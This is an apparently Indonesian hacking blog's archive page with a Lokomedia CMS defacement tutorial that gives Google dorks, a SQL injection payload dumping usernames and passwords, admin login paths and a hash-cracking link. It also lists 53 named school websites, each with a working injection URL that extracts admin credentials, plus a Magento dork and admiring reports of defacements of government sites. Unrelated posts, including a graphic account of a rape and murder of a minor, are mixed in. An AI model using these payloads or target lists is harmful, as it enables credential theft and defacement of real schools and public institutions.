Minggu, 07 Agustus 2016

Tutorial Deface Sql Lokomedia + Tamper Data + Upload Shell + Tebas Index

inurl:statis-1-profil.html inurl:statis-2-profil.html inurl:statis-3-strukturorganisasi.html inurl:statis-1-visimisi.html inurl:statis-1-tujuan.html exploit : /statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html ubah sendiri exploitnya :') ( gak vuln cari target lain ) biasanya admin login nya /redaktur /adminweb /administrator /redaktur/index.php /adminlogin /admin /login.php

kalau udah md5nya hash di sini > https://hashkiller.co.uk/md5-decrypter.aspx



Langsung aja Videonya Cek Di bawah ini :) 



Read more

Sabtu, 06 Agustus 2016

Sanjungan Jiwa Kembali Beraksi, Situs Badan SAR Nasional Jadi Korban

Hari ini kembali LinuxSec mengabarkan kasus peretasan yang menimpa situs penting di Indonesia. Sebelumnya tentu masih kalian ingat saat defacer dengan kodenama "ice-cream" meretas subdomain UGM beberapa hari yang lalu, kali ini dia kembali beraksi dengan meretas situs Badan SAR Nasional.

Seperti kasus peretasan Subdomain UGM beberapa waktu lalu, nampaknya tidak ada motif khusus di aksi peretasan Basarnas kali ini. Terbukti hanya pesan 
" Kindly Fix The Bug Immediately"
Yang menunjukkan defacer dengan kodenama ice-cream ini berharap sang admin segera melakukan patching terhadap celah yang ada di situs basarnas.
Selain itu, pelaku juga meninggalkan beberapa nama / nick defacer yang kemungkinan adalah temannya atau mungkin juga sesama member di tim Sanjungan Jiwa sendiri.
Jje Incovers - Strlen - ReC0ded - Pak Haxor - Isal Dot ID - ViruzTomcat - Topi Jerami - Wonka - AdrElite - Mr Error404 - condetg3tar - Panataran - ./L1ght_R00t - eX-Sh1Ne - Podol - Eitaro Attacker - KONSLET - CaptSalkus48 - AnoaGhost - $n00.py - Virulent-ID - Sh0uT0u7 - Saviour Attacker - Wolfon - Rebels - MR.INTERCEPTION
Selain meretas domain utama Basarnas, ice-cream juga meretas 33 subdomain tiap regional dari Basarnas sendiri. Berikut list situs yag dia retas.
www.basarnas.go.id
www.tanjungpinang.basarnas.go.id
www.bandung.basarnas.go.id
www.balikpapan.basarnas.go.id
www.banjarmasin.basarnas.go.id
www.aceh.basarnas.go.id
www.ambon.basarnas.go.id
www.bengkulu.basarnas.go.id
www.biak.basarnas.go.id
www.denpasar.basarnas.go.id
www.jakarta.basarnas.go.id
www.jambi.basarnas.go.id
www.jayapura.basarnas.go.id
www.kendari.basarnas.go.id
www.kupang.basarnas.go.id
www.lampung.basarnas.go.id
www.gorontalo.basarnas.go.id
www.manado.basarnas.go.id
www.makassar.basarnas.go.id
www.medan.basarnas.go.id
www.merauke.basarnas.go.id
www.palembang.basarnas.go.id
www.padang.basarnas.go.id
www.palu.basarnas.go.id
www.semarang.basarnas.go.id
www.pangkalpinang.basarnas.go.id
www.pekanbaru.basarnas.go.id
www.surabaya.basarnas.go.id
www.sorong.basarnas.go.id
www.timika.basarnas.go.id
www.ternate.basarnas.go.id
www.yogyakarta.basarnas.go.id
www.manokwari.basarnas.go.id
www.mataram.basarnas.go.id
Saat berita ini diturunkan, domain utama basarnas dalam keadaan under maintenance, namun untuk subdomainnya rata rata masih dalam keadaan di deface.
Untuk mirror nya bisa cek disini :
Untuk subdomainnya, hanya beberapa yang di notif dengan kodenama ice-cream karena sebelumnya sudah ada defacer lain pada bulan februari lalu yang mensubmit puluhan subdomain basarnas ke zone-h.

Semoa saja web web yang bersangkutan segera diperbaiki. Sekian berita kali ini dan selamat beraktivitas. (jack/lsc)
Read more

Jumat, 05 Agustus 2016

Perpustakaan Inspektorat Jenderal Kementerian Agama R.I Diretas Malaikat galau

Hari ini kembali LinuxSec mengabarkan aksi peretasan yang dilakukan oleh defacer terhadap situs dalam negeri. Kali ini korbannya adalah Perpustakaan Inspektorat Jenderal Kementerian Agama R.I atau subdomain dari kemenag.go.id.

Pelaku hanya menitipkan file " hack.html " pada direktori "python " situs portalitjen.kemenag.go.id.
Tidak ada pesan khusus yang ditujukan kepada admin ataupun pihak Kementerian Agama. Hanya notice berikut :
INDONESIA DEFACER TERSAKITI HERE MALAIKAT GALAU
Pelaku nampaknya hanya iseng saja meretas subdomain dari kemenag.go.id tersebut.
Dengan adanya peretasan ini mendambah daftar situs pemerintah yang menjadi korban iseng dari defacer defacer yang rata rata berasal dari dalam negeri sendiri. Hal ini menunjukkan betapa lemahnya keamanan situs situs pemerintahan kita.
bahkan tidak jarang admin admin dari situs pemerintahan bertndak sangat lambat terhadap aksi peretasan.
Seperti contohnya dalam kasus kali ini, sampai berita ini dipublish belum ada perbaikan dari situs yang bersangkutan.
Untuk mirror nya bisa kalian cek disini :

Oke sekian berita siang hari ini, selamat beraktivitas. (jack/lsc)
Read more

Google Hapus Palestina di Google Maps Google kemudian mengganti Palestina dengan Israel






assalamualaikum.. Save Palestina !! Allahu Akbar .. Palestina telah hilang di google maps -_-
dan diganti dgn Israel ?

Google sedang mendapat kritikan tajam dari Forum Jurnalis Palestina. Pangkalnya yakni keputusan Google yang menghapus nama Palestina dari peta Google Maps dan menggantinya dengan Israel. Penghapusan nama Palestina itu dilakukan pada 25 Juli.

Dikutip dari Middleeastmonitor, Jumat 5 Agustus 2016, dalam pernyataan yang dirilis pada Kamis kemarin, forum jurnalis tersebut menuding keputusan Google menghapus nama Palestina dari Google Maps merupakan bagian dari skema Israel untuk membuat legitimasi negara zionis tersebut.

"Ini merupakan skema untuk membumikan nama Israel sebagai negara yang sah untuk generasi mendatang dan menghapus nama Palestina untuk selamanya," tulis pernyataan forum tersebut.

Forum itu menilai langkah penghapusan nama Palestina dari Google Maps itu dirancang untuk memutarbalikkan sejarah, geografi serta memalsukan hak rakyat Palestina atas tanah air mereka.

"Langkah ini merupakan upaya kegagalan untuk merusak memori rakyat Palestina, Arab dan Dunia," kata Forum itu.

Forum Jurnalis Palestina menegaskan, langkah Google itu bertentangan dengan semua norma dan konvensi internasional. Mereka menekankan Google harus menarik kembali perubahan nama Palestina dalam Google Maps tersebut.




Read more

Magento Tools & File System Magento Download


assalamualaikum .. ane mau share magento toolss .. 

dork : intext:magento inurl:/account/login site:.uk

tuh dork magento .. gonta ganti site nya boy ..

Download = Magento Tools

Download File System = File System Magento

terima kasih atas kunjungan andaaaaaaaa.... 
Read more

SMPN 32 BEKASI Setelah di Deface Siswanya, Akhirnya di Suspend.


SMPN 32 Bekasi yang sebelumnya di deface oleh siswanya sendiri sekarang akhirnya websitenya di Suspend dan sekarang tidak dapat di akses lagi.

Saya berhasil mewawancarai siswa SMPN 32 Bekasi yang meretas website tersebut. Dari hasil wawancara tersebut saya dapat menyimpulkan bahwa memang yang meretas website tersebut adalah siswa dari sekolah itu sendiri dan berarti dia duduk di bangku SMP yang tergolong masih muda.

Hacker muda tersebut mengatakan ia merasa senang setelah website sekolahnya di suspend dan tidak bisa di akses lagi. Namun ia mengatakan bahwa sampai sekarang belum ada respon dari guru-gurunya ntah karena gurunya tidak mengetahui dia pelaku peretasan tersebut atau memang gurunya tidak mengambil pusing terhadap peretasan yang ia lakukan.

Walaupun websitenya sudah di suspend, kita masih bisa melihat mirrornya di http://aljyyosh.org/mirror.php?id=173781
Read more

53 Website Sekolah yang Memiliki Bug di Beberkan!!


Sebanyak 53 website sekolah di indonesia dari cms sekolahku yang memiliki bug di beberkan di halaman fanspage Cyber Merah Putih. Namun anehnya, admin CMP hanya mengupload link bug websitenya dan tidak di deface.


Ternyata, Admin CMP tidak melakukan deface ke web tersebut adalah karena ia mendukung kemajuan pendidikan di Indonesia. Di halaman CMP tersebut adminnya mengatakan jikalau ada siswa, guru, admin, atau kepala sekolah dari web tersebut harap bug webnya di fix dan Admin menyediakan cara untuk fix webnya.

Cara Fix Bug:
1. Buka file application/controllers/Home.php
2. Cari baris 560 Fungsi get_agenda_sekolah()
3. ganti dengan yang di link ini : http://pastebin.com/CUSTLw8m

Inilah 53 Website tersebut:
http://www.smkn2sungaipenuh.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://smkkarnas.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://sman1btg.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://home.smkn2bagor.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://smkkr2tomohon.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://sman1bantan.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://www.smadrsoetomo.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://www.smpn19depok.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://www.man1kotamadiun.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://smasumbangsih.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://sman9tasik.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://sman9-bpp.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://smanu1-bws.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://smansawonomulyo.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://www.sman1jalancagak.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
ar-rhaudhaseluma.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smknumaarif2kudus.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smklugina.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smkn1panyabungan.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
sman4mandau.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.man1bandarlampung.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://sman1-bna.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
mutiarailmu.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://smk4kendal.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://sman2amfoangtimur.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.man2-kotaprobolinggo.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smkn1kudus.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
http://www.smpn13bogor.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
ppdb.manrejotangan.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smpn8blitar.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
sman1meukek.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smkn1lemahabang.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smktarunasatria.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smkn1-pasuruan.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
mtsnegeritaliwang.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
sman2pinggir.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
sman1pekanbaru.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
site.smkn5kabtangerang.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.mammhtayu.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smpn7tangsel.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smkn3pekanbaru.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smp3nglipar.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smkyajdepok.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smakaryabhakti.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.sma-dianandalas-padang.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
slbnserdangbedagai.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smkn6mks.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.smkhasanah.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smk-rosma.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smpn2pengaron.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smkn1makassar.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
www.miislamiyahsurabaya.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
smpn1tanjungkerta.sch.id/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+


Read more

Kamis, 04 Agustus 2016

SADIS! Diperkosa Bergiliran, Lalu Kemaluan Siswi SMK Ditusuk Batang Singkong


Perbuatan para tersangka ini benar-benar keji. Setelah memperkosa secara bergilir dan sebelum dibunuh, kemaluan siswi SMK Muhammadiyah Kotabumi berinisial FL (17) sempat ditusuk batang singkong.Perbuatan itu dilakukan tersangka Dedi Wijaya (28), warga pasar pagi Kotabumi. Satu dari tiga tersangka ini tewas sehari setelah diamankan. Sedangkan dua tersangka lainnya, yakni Budiyono (24) dan Ari Purnomo (29) keduanya warga Sindang Sari Kotabumi
Hal itu terungkap dalam rekontruksi yang digelar di perkebunan sawit Kelurahan Tanjungsenang, Kecamatan Kotabumi Selatan, sekitar pukul 10.00 WIB, Selasa(2/8).
Dalam rekontruksi itu digelar sebanyak 36 adegan, posisi pelaku Dedi diperankan oleh salah seorang pedagang yang biasa mangkal di Mapolres Lampura. Dimulai dari ketiganya sengaja mengikuti korban untuk mengambil handphone dan uangnya.
Sesampai di TKP tepatnya di tepi sungai, para pelaku mengeksekusi korban. Saat itu, tersangka Ari memukul korban terlebih dahulu hingga terjatuh, disusul dengan pukulan bertubi-tubi tersangka Dedi, dan Budiyono. Saat korban setengah sadar, para pelaku mengambil handphone dan uang korban.
Tak sampai disitu, muncul niat para pelaku untuk memperkosa korban secara bergilir, yang dimulai oleh Dedi lalu Budiyono dan Ari. Bahkan, aksi sadis dilakukan Dedi, dengan memasukkan batang singkong ke dalam kemaluan korban.
Selanjutnya, tersangka Dedi dan Ari kembali memukul korban hingga tewas. Sebelum dibuang ke sungai, para pelaku mengenakan kembali pakaian korban.
Berdasarkan pantauan, reka ulang disaksikan langsung oleh Kasat Reskrim AKP Supriyanto Husin, Kasi Pidum Kejari Kotabumi Indra Gunawan, dan para tersangka mendapat pengawalan ketat dari aparat kepolisian setempat
Kasat Reskrim AKP Supriyanto Husin mewakili Kapores Lampura AKBP Dedi Supriadi menjelaskan, pihaknya sengaja mengalihkan lokasi reka ulang untuk menghindari hal-hal yang tidak diinginkan. “Rekonstruksi kasus ini untuk memperjelas peran masing-masing tersangka,”singkatnya.
Untuk diketahui, FL warga LK III, Kelurahan Sindang Sari, Kotabumi, ditemukan tak bernyawa mengapung di aliran Sungai Batanghari Dusun Ulak Durian, Desa Banjar Agung, sekitar pukul 11.00 WIB Senin (9/5).
Di hari yang sama sekitar pukul 15.00 Wib, Polres setempat membekuk tiga tersangka. Dari keterangan ketiganya mengakui telah memperkosa dan membunuh FL. (rid/adi)

sumber = http://radarlampung.co.id/read/
Read more